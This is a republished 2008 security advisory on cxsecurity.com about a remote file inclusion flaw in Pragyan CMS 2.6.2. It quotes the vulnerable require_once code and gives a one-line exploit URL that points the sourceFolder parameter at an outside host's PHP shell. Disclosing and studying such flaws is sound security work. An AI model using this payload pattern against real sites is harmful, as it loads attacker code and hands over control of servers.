Pragyan CMS 2.6.2 (sourceFolder) Remote File Inclusion Vulnerability

2008.07.20
Credit: N3TR00T3R
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<< In The Name Of GOD >> ------------------------------------------------------------- - [ Persian Boys Hacking Team ] -:- 2008 - - discovered by N3TR00T3R [at] Y! [dot] com - pragyan 2.6.2 Remote File Includion - download :http://sourceforge.net/project/showfiles.php?group_id=220286 - sp tnx : Sp3shial,Veroonic4,God_Master_hacker,a_reptil,Ciph3r,shayan_cmd r00t.master,Dr.root,Pouya_server,Spyn3t,LordKourosh,123qwe,mr.n4ser Zahacker,goli_boya,i_reza_i,programer, and all irchatan members ... [www.Persian-Boys.com] & [www.irchatan.com] -------------------------------------------------------------- if register_globals = On; Vul Code : [/cms/modules/form.lib.php] ########################################################## #global $sourceFolder; #global $moduleFolder; #require_once("$sourceFolder/$moduleFolder/form/editform.php"); #require_once("$sourceFolder/$moduleFolder/form/editformelement.php"); #require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php"); #require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php"); #require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php"); ########################################################## Exploit : ########################################################## # # www.target.com/path/cms/modules/form.lib.php?sourceFolder=http://shell.own3r.by.ru/syn99.php? # ##########################################################

References:

http://xforce.iss.net/xforce/xfdb/43777
http://www.securityfocus.com/bid/30235
http://www.milw0rm.com/exploits/6078
http://secunia.com/advisories/31101


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top